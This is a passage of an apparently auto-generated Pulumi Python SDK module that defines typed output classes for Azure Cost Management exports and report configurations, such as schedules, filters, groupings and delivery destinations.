import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'CommonExportPropertiesResponse',
'ErrorDetailsResponse',
'ExportDatasetConfigurationResponse',
'ExportDatasetResponse',
'ExportDefinitionResponse',
'ExportDeliveryDestinationResponse',
'ExportDeliveryInfoResponse',
'ExportExecutionListResultResponse',
'ExportExecutionResponse',
'ExportRecurrencePeriodResponse',
'ExportScheduleResponse',
'ExportTimePeriodResponse',
'KpiPropertiesResponse',
'PivotPropertiesResponse',
'ReportConfigAggregationResponse',
'ReportConfigComparisonExpressionResponse',
'ReportConfigDatasetConfigurationResponse',
'ReportConfigDatasetResponse',
'ReportConfigDefinitionResponse',
'ReportConfigDeliveryDestinationResponse',
'ReportConfigDeliveryInfoResponse',
'ReportConfigFilterResponse',
'ReportConfigGroupingResponse',
'ReportConfigRecurrencePeriodResponse',
'ReportConfigScheduleResponse',
'ReportConfigSortingResponse',
'ReportConfigTimePeriodResponse',
]
@pulumi.output_type
class CommonExportPropertiesResponse(dict):
"""
The common properties of the export.
"""
def __init__(__self__, *,
definition: 'outputs.ExportDefinitionResponse',
delivery_info: 'outputs.ExportDeliveryInfoResponse',
next_run_time_estimate: str,
format: Optional[str] = None,
run_history: Optional['outputs.ExportExecutionListResultResponse'] = None):
"""
The common properties of the export.
:param 'ExportDefinitionResponseArgs' definition: Has the definition for the export.
:param 'ExportDeliveryInfoResponseArgs' delivery_info: Has delivery information for the export.
:param str next_run_time_estimate: If the export has an active schedule, provides an estimate of the next execution time.
:param str format: The format of the export being delivered. Currently only 'Csv' is supported.
:param 'ExportExecutionListResultResponseArgs' run_history: If requested, has the most recent execution history for the export.
"""
pulumi.set(__self__, "definition", definition)
pulumi.set(__self__, "delivery_info", delivery_info)
pulumi.set(__self__, "next_run_time_estimate", next_run_time_estimate)
if format is not None:
pulumi.set(__self__, "format", format)
if run_history is not None:
pulumi.set(__self__, "run_history", run_history)
@property
@pulumi.getter
def definition(self) -> 'outputs.ExportDefinitionResponse':
"""
Has the definition for the export.
"""
return pulumi.get(self, "definition")
@property
@pulumi.getter(name="deliveryInfo")
def delivery_info(self) -> 'outputs.ExportDeliveryInfoResponse':
"""
Has delivery information for the export.
"""
return pulumi.get(self, "delivery_info")
@property
@pulumi.getter(name="nextRunTimeEstimate")
def next_run_time_estimate(self) -> str:
"""
If the export has an active schedule, provides an estimate of the next execution time.
"""
return pulumi.get(self, "next_run_time_estimate")
@property
@pulumi.getter
def format(self) -> Optional[str]:
"""
The format of the export being delivered. Currently only 'Csv' is supported.
"""
return pulumi.get(self, "format")
@property
@pulumi.getter(name="runHistory")
def run_history(self) -> Optional['outputs.ExportExecutionListResultResponse']:
"""
If requested, has the most recent execution history for the export.
"""
return pulumi.get(self, "run_history")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ErrorDetailsResponse(dict):
"""
The details of the error.
"""
def __init__(__self__, *,
code: str,
message: str):
"""
The details of the error.
:param str code: Error code.
:param str message: Error message indicating why the operation failed.
"""
pulumi.set(__self__, "code", code)
pulumi.set(__self__, "message", message)
@property
@pulumi.getter
def code(self) -> str:
"""
Error code.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def message(self) -> str:
"""
Error message indicating why the operation failed.
"""
return pulumi.get(self, "message")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDatasetConfigurationResponse(dict):
"""
The export dataset configuration. Allows columns to be selected for the export. If not provided then the export will include all available columns.
"""
def __init__(__self__, *,
columns: Optional[Sequence[str]] = None):
"""
The export dataset configuration. Allows columns to be selected for the export. If not provided then the export will include all available columns.
:param Sequence[str] columns: Array of column names to be included in the export. If not provided then the export will include all available columns. The available columns can vary by customer channel (see examples).
"""
if columns is not None:
pulumi.set(__self__, "columns", columns)
@property
@pulumi.getter
def columns(self) -> Optional[Sequence[str]]:
"""
Array of column names to be included in the export. If not provided then the export will include all available columns. The available columns can vary by customer channel (see examples).
"""
return pulumi.get(self, "columns")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDatasetResponse(dict):
"""
The definition for data in the export.
"""
def __init__(__self__, *,
configuration: Optional['outputs.ExportDatasetConfigurationResponse'] = None,
granularity: Optional[str] = None):
"""
The definition for data in the export.
:param 'ExportDatasetConfigurationResponseArgs' configuration: The export dataset configuration.
:param str granularity: The granularity of rows in the export. Currently only 'Daily' is supported.
"""
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if granularity is not None:
pulumi.set(__self__, "granularity", granularity)
@property
@pulumi.getter
def configuration(self) -> Optional['outputs.ExportDatasetConfigurationResponse']:
"""
The export dataset configuration.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter
def granularity(self) -> Optional[str]:
"""
The granularity of rows in the export. Currently only 'Daily' is supported.
"""
return pulumi.get(self, "granularity")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDefinitionResponse(dict):
"""
The definition of an export.
"""
def __init__(__self__, *,
timeframe: str,
type: str,
data_set: Optional['outputs.ExportDatasetResponse'] = None,
time_period: Optional['outputs.ExportTimePeriodResponse'] = None):
"""
The definition of an export.
:param str timeframe: The time frame for pulling data for the export. If custom, then a specific time period must be provided.
:param str type: The type of the export. Note that 'Usage' is equivalent to 'ActualCost' and is applicable to exports that do not yet provide data for charges or amortization for service reservations.
:param 'ExportDatasetResponseArgs' data_set: The definition for data in the export.
:param 'ExportTimePeriodResponseArgs' time_period: Has time period for pulling data for the export.
"""
pulumi.set(__self__, "timeframe", timeframe)
pulumi.set(__self__, "type", type)
if data_set is not None:
pulumi.set(__self__, "data_set", data_set)
if time_period is not None:
pulumi.set(__self__, "time_period", time_period)
@property
@pulumi.getter
def timeframe(self) -> str:
"""
The time frame for pulling data for the export. If custom, then a specific time period must be provided.
"""
return pulumi.get(self, "timeframe")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the export. Note that 'Usage' is equivalent to 'ActualCost' and is applicable to exports that do not yet provide data for charges or amortization for service reservations.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="dataSet")
def data_set(self) -> Optional['outputs.ExportDatasetResponse']:
"""
The definition for data in the export.
"""
return pulumi.get(self, "data_set")
@property
@pulumi.getter(name="timePeriod")
def time_period(self) -> Optional['outputs.ExportTimePeriodResponse']:
"""
Has time period for pulling data for the export.
"""
return pulumi.get(self, "time_period")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDeliveryDestinationResponse(dict):
"""
The destination information for the delivery of the export. To allow access to a storage account, you must register the account's subscription with the Microsoft.CostManagementExports resource provider. This is required once per subscription. When creating an export in the Azure portal, it is done automatically, however API users need to register the subscription. For more information see https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-manager-supported-services .
"""
def __init__(__self__, *,
container: str,
resource_id: str,
root_folder_path: Optional[str] = None):
"""
The destination information for the delivery of the export. To allow access to a storage account, you must register the account's subscription with the Microsoft.CostManagementExports resource provider. This is required once per subscription. When creating an export in the Azure portal, it is done automatically, however API users need to register the subscription. For more information see https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-manager-supported-services .
:param str container: The name of the container where exports will be uploaded.
:param str resource_id: The resource id of the storage account where exports will be delivered.
:param str root_folder_path: The name of the directory where exports will be uploaded.
"""
pulumi.set(__self__, "container", container)
pulumi.set(__self__, "resource_id", resource_id)
if root_folder_path is not None:
pulumi.set(__self__, "root_folder_path", root_folder_path)
@property
@pulumi.getter
def container(self) -> str:
"""
The name of the container where exports will be uploaded.
"""
return pulumi.get(self, "container")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> str:
"""
The resource id of the storage account where exports will be delivered.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="rootFolderPath")
def root_folder_path(self) -> Optional[str]:
"""
The name of the directory where exports will be uploaded.
"""
return pulumi.get(self, "root_folder_path")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDeliveryInfoResponse(dict):
"""
    The delivery information associated with an export.
"""
def __init__(__self__, *,
destination: 'outputs.ExportDeliveryDestinationResponse'):
"""
        The delivery information associated with an export.
        :param 'ExportDeliveryDestinationResponseArgs' destination: Has destination for the export being delivered.
"""
pulumi.set(__self__, "destination", destination)
@property
@pulumi.getter
def destination(self) -> 'outputs.ExportDeliveryDestinationResponse':
"""
Has destination for the export being delivered.
"""
return pulumi.get(self, "destination")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportExecutionListResultResponse(dict):
"""
Result of listing the execution history of an export.
"""
def __init__(__self__, *,
value: Sequence['outputs.ExportExecutionResponse']):
"""
Result of listing the execution history of an export.
:param Sequence['ExportExecutionResponseArgs'] value: A list of export executions.
"""
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def value(self) -> Sequence['outputs.ExportExecutionResponse']:
"""
A list of export executions.
"""
return pulumi.get(self, "value")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportExecutionResponse(dict):
"""
An export execution.
"""
def __init__(__self__, *,
id: str,
name: str,
tags: Mapping[str, str],
type: str,
error: Optional['outputs.ErrorDetailsResponse'] = None,
execution_type: Optional[str] = None,
file_name: Optional[str] = None,
processing_end_time: Optional[str] = None,
processing_start_time: Optional[str] = None,
run_settings: Optional['outputs.CommonExportPropertiesResponse'] = None,
status: Optional[str] = None,
submitted_by: Optional[str] = None,
submitted_time: Optional[str] = None):
"""
An export execution.
:param str id: Resource Id.
:param str name: Resource name.
:param Mapping[str, str] tags: Resource tags.
:param str type: Resource type.
:param 'ErrorDetailsResponseArgs' error: The details of any error.
:param str execution_type: The type of the export execution.
:param str file_name: The name of the exported file.
:param str processing_end_time: The time when the export execution finished.
:param str processing_start_time: The time when export was picked up to be executed.
:param 'CommonExportPropertiesResponseArgs' run_settings: The export settings that were in effect for this execution.
:param str status: The last known status of the export execution.
:param str submitted_by: The identifier for the entity that executed the export. For OnDemand executions it is the user email. For scheduled executions it is 'System'.
:param str submitted_time: The time when export was queued to be executed.
"""
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "tags", tags)
pulumi.set(__self__, "type", type)
if error is not None:
pulumi.set(__self__, "error", error)
if execution_type is not None:
pulumi.set(__self__, "execution_type", execution_type)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if processing_end_time is not None:
pulumi.set(__self__, "processing_end_time", processing_end_time)
if processing_start_time is not None:
pulumi.set(__self__, "processing_start_time", processing_start_time)
if run_settings is not None:
pulumi.set(__self__, "run_settings", run_settings)
if status is not None:
pulumi.set(__self__, "status", status)
if submitted_by is not None:
pulumi.set(__self__, "submitted_by", submitted_by)
if submitted_time is not None:
pulumi.set(__self__, "submitted_time", submitted_time)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def error(self) -> Optional['outputs.ErrorDetailsResponse']:
"""
The details of any error.
"""
return pulumi.get(self, "error")
@property
@pulumi.getter(name="executionType")
def execution_type(self) -> Optional[str]:
"""
The type of the export execution.
"""
return pulumi.get(self, "execution_type")
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[str]:
"""
The name of the exported file.
"""
return pulumi.get(self, "file_name")
@property
@pulumi.getter(name="processingEndTime")
def processing_end_time(self) -> Optional[str]:
"""
The time when the export execution finished.
"""
return pulumi.get(self, "processing_end_time")
@property
@pulumi.getter(name="processingStartTime")
def processing_start_time(self) -> Optional[str]:
"""
The time when export was picked up to be executed.
"""
return pulumi.get(self, "processing_start_time")
@property
@pulumi.getter(name="runSettings")
def run_settings(self) -> Optional['outputs.CommonExportPropertiesResponse']:
"""
The export settings that were in effect for this execution.
"""
return pulumi.get(self, "run_settings")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
The last known status of the export execution.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="submittedBy")
def submitted_by(self) -> Optional[str]:
"""
The identifier for the entity that executed the export. For OnDemand executions it is the user email. For scheduled executions it is 'System'.
"""
return pulumi.get(self, "submitted_by")
@property
@pulumi.getter(name="submittedTime")
def submitted_time(self) -> Optional[str]:
"""
The time when export was queued to be executed.
"""
return pulumi.get(self, "submitted_time")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportRecurrencePeriodResponse(dict):
"""
The start and end date for recurrence schedule.
"""
def __init__(__self__, *,
from_: str,
to: Optional[str] = None):
"""
The start and end date for recurrence schedule.
:param str from_: The start date of recurrence.
:param str to: The end date of recurrence.
"""
pulumi.set(__self__, "from_", from_)
if to is not None:
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date of recurrence.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> Optional[str]:
"""
The end date of recurrence.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportScheduleResponse(dict):
"""
The schedule associated with the export.
"""
def __init__(__self__, *,
recurrence: str,
recurrence_period: Optional['outputs.ExportRecurrencePeriodResponse'] = None,
status: Optional[str] = None):
"""
The schedule associated with the export.
:param str recurrence: The schedule recurrence.
:param 'ExportRecurrencePeriodResponseArgs' recurrence_period: Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
:param str status: The status of the export's schedule. If 'Inactive', the export's schedule is paused.
"""
pulumi.set(__self__, "recurrence", recurrence)
if recurrence_period is not None:
pulumi.set(__self__, "recurrence_period", recurrence_period)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def recurrence(self) -> str:
"""
The schedule recurrence.
"""
return pulumi.get(self, "recurrence")
@property
@pulumi.getter(name="recurrencePeriod")
def recurrence_period(self) -> Optional['outputs.ExportRecurrencePeriodResponse']:
"""
Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
"""
return pulumi.get(self, "recurrence_period")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
The status of the export's schedule. If 'Inactive', the export's schedule is paused.
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportTimePeriodResponse(dict):
"""
The date range for data in the export. This should only be specified with timeFrame set to 'Custom'. The maximum date range is 3 months.
"""
def __init__(__self__, *,
from_: str,
to: str):
"""
The date range for data in the export. This should only be specified with timeFrame set to 'Custom'. The maximum date range is 3 months.
:param str from_: The start date for export data.
:param str to: The end date for export data.
"""
pulumi.set(__self__, "from_", from_)
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date for export data.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> str:
"""
The end date for export data.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KpiPropertiesResponse(dict):
"""
Each KPI must contain a 'type' and 'enabled' key.
"""
def __init__(__self__, *,
enabled: Optional[bool] = None,
id: Optional[str] = None,
type: Optional[str] = None):
"""
Each KPI must contain a 'type' and 'enabled' key.
:param bool enabled: show the KPI in the UI?
:param str id: ID of resource related to metric (budget).
:param str type: KPI type (Forecast, Budget).
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
show the KPI in the UI?
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
ID of resource related to metric (budget).
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
KPI type (Forecast, Budget).
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PivotPropertiesResponse(dict):
"""
Each pivot must contain a 'type' and 'name'.
"""
def __init__(__self__, *,
name: Optional[str] = None,
type: Optional[str] = None):
"""
Each pivot must contain a 'type' and 'name'.
:param str name: Data field to show in view.
:param str type: Data type to show in view.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Data field to show in view.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Data type to show in view.
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigAggregationResponse(dict):
"""
The aggregation expression to be used in the report.
"""
def __init__(__self__, *,
function: str,
name: str):
"""
The aggregation expression to be used in the report.
:param str function: The name of the aggregation function to use.
:param str name: The name of the column to aggregate.
"""
pulumi.set(__self__, "function", function)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def function(self) -> str:
"""
The name of the aggregation function to use.
"""
return pulumi.get(self, "function")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to aggregate.
"""
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigComparisonExpressionResponse(dict):
"""
The comparison expression to be used in the report.
"""
def __init__(__self__, *,
name: str,
operator: str,
values: Sequence[str]):
"""
The comparison expression to be used in the report.
:param str name: The name of the column to use in comparison.
:param str operator: The operator to use for comparison.
:param Sequence[str] values: Array of values to use for comparison
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "operator", operator)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to use in comparison.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def operator(self) -> str:
"""
The operator to use for comparison.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Array of values to use for comparison
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDatasetConfigurationResponse(dict):
"""
The configuration of dataset in the report.
"""
def __init__(__self__, *,
columns: Optional[Sequence[str]] = None):
"""
The configuration of dataset in the report.
:param Sequence[str] columns: Array of column names to be included in the report. Any valid report column name is allowed. If not provided, then report includes all columns.
"""
if columns is not None:
pulumi.set(__self__, "columns", columns)
@property
@pulumi.getter
def columns(self) -> Optional[Sequence[str]]:
"""
Array of column names to be included in the report. Any valid report column name is allowed. If not provided, then report includes all columns.
"""
return pulumi.get(self, "columns")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDatasetResponse(dict):
"""
The definition of data present in the report.
"""
def __init__(__self__, *,
aggregation: Optional[Mapping[str, 'outputs.ReportConfigAggregationResponse']] = None,
configuration: Optional['outputs.ReportConfigDatasetConfigurationResponse'] = None,
filter: Optional['outputs.ReportConfigFilterResponse'] = None,
granularity: Optional[str] = None,
grouping: Optional[Sequence['outputs.ReportConfigGroupingResponse']] = None,
sorting: Optional[Sequence['outputs.ReportConfigSortingResponse']] = None):
"""
The definition of data present in the report.
:param Mapping[str, 'ReportConfigAggregationResponseArgs'] aggregation: Dictionary of aggregation expression to use in the report. The key of each item in the dictionary is the alias for the aggregated column. Report can have up to 2 aggregation clauses.
:param 'ReportConfigDatasetConfigurationResponseArgs' configuration: Has configuration information for the data in the report. The configuration will be ignored if aggregation and grouping are provided.
:param 'ReportConfigFilterResponseArgs' filter: Has filter expression to use in the report.
:param str granularity: The granularity of rows in the report.
:param Sequence['ReportConfigGroupingResponseArgs'] grouping: Array of group by expression to use in the report. Report can have up to 2 group by clauses.
:param Sequence['ReportConfigSortingResponseArgs'] sorting: Array of order by expression to use in the report.
"""
if aggregation is not None:
pulumi.set(__self__, "aggregation", aggregation)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if filter is not None:
pulumi.set(__self__, "filter", filter)
if granularity is not None:
pulumi.set(__self__, "granularity", granularity)
if grouping is not None:
pulumi.set(__self__, "grouping", grouping)
if sorting is not None:
pulumi.set(__self__, "sorting", sorting)
@property
@pulumi.getter
def aggregation(self) -> Optional[Mapping[str, 'outputs.ReportConfigAggregationResponse']]:
"""
Dictionary of aggregation expression to use in the report. The key of each item in the dictionary is the alias for the aggregated column. Report can have up to 2 aggregation clauses.
"""
return pulumi.get(self, "aggregation")
@property
@pulumi.getter
def configuration(self) -> Optional['outputs.ReportConfigDatasetConfigurationResponse']:
"""
Has configuration information for the data in the report. The configuration will be ignored if aggregation and grouping are provided.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter
def filter(self) -> Optional['outputs.ReportConfigFilterResponse']:
"""
Has filter expression to use in the report.
"""
return pulumi.get(self, "filter")
@property
@pulumi.getter
def granularity(self) -> Optional[str]:
"""
The granularity of rows in the report.
"""
return pulumi.get(self, "granularity")
@property
@pulumi.getter
def grouping(self) -> Optional[Sequence['outputs.ReportConfigGroupingResponse']]:
"""
Array of group by expression to use in the report. Report can have up to 2 group by clauses.
"""
return pulumi.get(self, "grouping")
@property
@pulumi.getter
def sorting(self) -> Optional[Sequence['outputs.ReportConfigSortingResponse']]:
"""
Array of order by expression to use in the report.
"""
return pulumi.get(self, "sorting")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDefinitionResponse(dict):
"""
The definition of a report config.
"""
def __init__(__self__, *,
timeframe: str,
type: str,
dataset: Optional['outputs.ReportConfigDatasetResponse'] = None,
time_period: Optional['outputs.ReportConfigTimePeriodResponse'] = None):
"""
The definition of a report config.
:param str timeframe: The time frame for pulling data for the report. If custom, then a specific time period must be provided.
:param str type: The type of the report.
:param 'ReportConfigDatasetResponseArgs' dataset: Has definition for data in this report config.
:param 'ReportConfigTimePeriodResponseArgs' time_period: Has time period for pulling data for the report.
"""
pulumi.set(__self__, "timeframe", timeframe)
pulumi.set(__self__, "type", type)
if dataset is not None:
pulumi.set(__self__, "dataset", dataset)
if time_period is not None:
pulumi.set(__self__, "time_period", time_period)
@property
@pulumi.getter
def timeframe(self) -> str:
"""
The time frame for pulling data for the report. If custom, then a specific time period must be provided.
"""
return pulumi.get(self, "timeframe")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the report.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def dataset(self) -> Optional['outputs.ReportConfigDatasetResponse']:
"""
Has definition for data in this report config.
"""
return pulumi.get(self, "dataset")
@property
@pulumi.getter(name="timePeriod")
def time_period(self) -> Optional['outputs.ReportConfigTimePeriodResponse']:
"""
Has time period for pulling data for the report.
"""
return pulumi.get(self, "time_period")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDeliveryDestinationResponse(dict):
"""
The destination information for the delivery of the report.
"""
def __init__(__self__, *,
container: str,
resource_id: str,
root_folder_path: Optional[str] = None):
"""
The destination information for the delivery of the report.
:param str container: The name of the container where reports will be uploaded.
:param str resource_id: The resource id of the storage account where reports will be delivered.
:param str root_folder_path: The name of the directory where reports will be uploaded.
"""
pulumi.set(__self__, "container", container)
pulumi.set(__self__, "resource_id", resource_id)
if root_folder_path is not None:
pulumi.set(__self__, "root_folder_path", root_folder_path)
@property
@pulumi.getter
def container(self) -> str:
"""
The name of the container where reports will be uploaded.
"""
return pulumi.get(self, "container")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> str:
"""
The resource id of the storage account where reports will be delivered.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="rootFolderPath")
def root_folder_path(self) -> Optional[str]:
"""
The name of the directory where reports will be uploaded.
"""
return pulumi.get(self, "root_folder_path")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDeliveryInfoResponse(dict):
"""
The delivery information associated with a report config.
"""
def __init__(__self__, *,
destination: 'outputs.ReportConfigDeliveryDestinationResponse'):
"""
The delivery information associated with a report config.
:param 'ReportConfigDeliveryDestinationResponseArgs' destination: Has destination for the report being delivered.
"""
pulumi.set(__self__, "destination", destination)
@property
@pulumi.getter
def destination(self) -> 'outputs.ReportConfigDeliveryDestinationResponse':
"""
Has destination for the report being delivered.
"""
return pulumi.get(self, "destination")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigFilterResponse(dict):
"""
The filter expression to be used in the report.
"""
def __init__(__self__, *,
and_: Optional[Sequence['outputs.ReportConfigFilterResponse']] = None,
dimension: Optional['outputs.ReportConfigComparisonExpressionResponse'] = None,
not_: Optional['outputs.ReportConfigFilterResponse'] = None,
or_: Optional[Sequence['outputs.ReportConfigFilterResponse']] = None,
tag: Optional['outputs.ReportConfigComparisonExpressionResponse'] = None):
"""
The filter expression to be used in the report.
:param Sequence['ReportConfigFilterResponseArgs'] and_: The logical "AND" expression. Must have at least 2 items.
:param 'ReportConfigComparisonExpressionResponseArgs' dimension: Has comparison expression for a dimension
:param 'ReportConfigFilterResponseArgs' not_: The logical "NOT" expression.
:param Sequence['ReportConfigFilterResponseArgs'] or_: The logical "OR" expression. Must have at least 2 items.
:param 'ReportConfigComparisonExpressionResponseArgs' tag: Has comparison expression for a tag
"""
if and_ is not None:
pulumi.set(__self__, "and_", and_)
if dimension is not None:
pulumi.set(__self__, "dimension", dimension)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if or_ is not None:
pulumi.set(__self__, "or_", or_)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter(name="and")
def and_(self) -> Optional[Sequence['outputs.ReportConfigFilterResponse']]:
"""
The logical "AND" expression. Must have at least 2 items.
"""
return pulumi.get(self, "and_")
@property
@pulumi.getter
def dimension(self) -> Optional['outputs.ReportConfigComparisonExpressionResponse']:
"""
Has comparison expression for a dimension
"""
return pulumi.get(self, "dimension")
@property
@pulumi.getter(name="not")
def not_(self) -> Optional['outputs.ReportConfigFilterResponse']:
"""
The logical "NOT" expression.
"""
return pulumi.get(self, "not_")
@property
@pulumi.getter(name="or")
def or_(self) -> Optional[Sequence['outputs.ReportConfigFilterResponse']]:
"""
The logical "OR" expression. Must have at least 2 items.
"""
return pulumi.get(self, "or_")
@property
@pulumi.getter
def tag(self) -> Optional['outputs.ReportConfigComparisonExpressionResponse']:
"""
Has comparison expression for a tag
"""
return pulumi.get(self, "tag")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigGroupingResponse(dict):
"""
The group by expression to be used in the report.
"""
def __init__(__self__, *,
name: str,
type: str):
"""
The group by expression to be used in the report.
:param str name: The name of the column to group. This version supports subscription lowest possible grain.
:param str type: Has type of the column to group.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to group. This version supports subscription lowest possible grain.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> str:
"""
Has type of the column to group.
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigRecurrencePeriodResponse(dict):
"""
The start and end date for recurrence schedule.
"""
def __init__(__self__, *,
from_: str,
to: Optional[str] = None):
"""
The start and end date for recurrence schedule.
:param str from_: The start date of recurrence.
:param str to: The end date of recurrence. If not provided, we default this to 10 years from the start date.
"""
pulumi.set(__self__, "from_", from_)
if to is not None:
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date of recurrence.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> Optional[str]:
"""
The end date of recurrence. If not provided, we default this to 10 years from the start date.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigScheduleResponse(dict):
"""
The schedule associated with a report config.
"""
def __init__(__self__, *,
recurrence: str,
recurrence_period: 'outputs.ReportConfigRecurrencePeriodResponse',
status: Optional[str] = None):
"""
The schedule associated with a report config.
:param str recurrence: The schedule recurrence.
:param 'ReportConfigRecurrencePeriodResponseArgs' recurrence_period: Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
:param str status: The status of the schedule. Whether active or not. If inactive, the report's scheduled execution is paused.
"""
pulumi.set(__self__, "recurrence", recurrence)
pulumi.set(__self__, "recurrence_period", recurrence_period)
if status is not None:
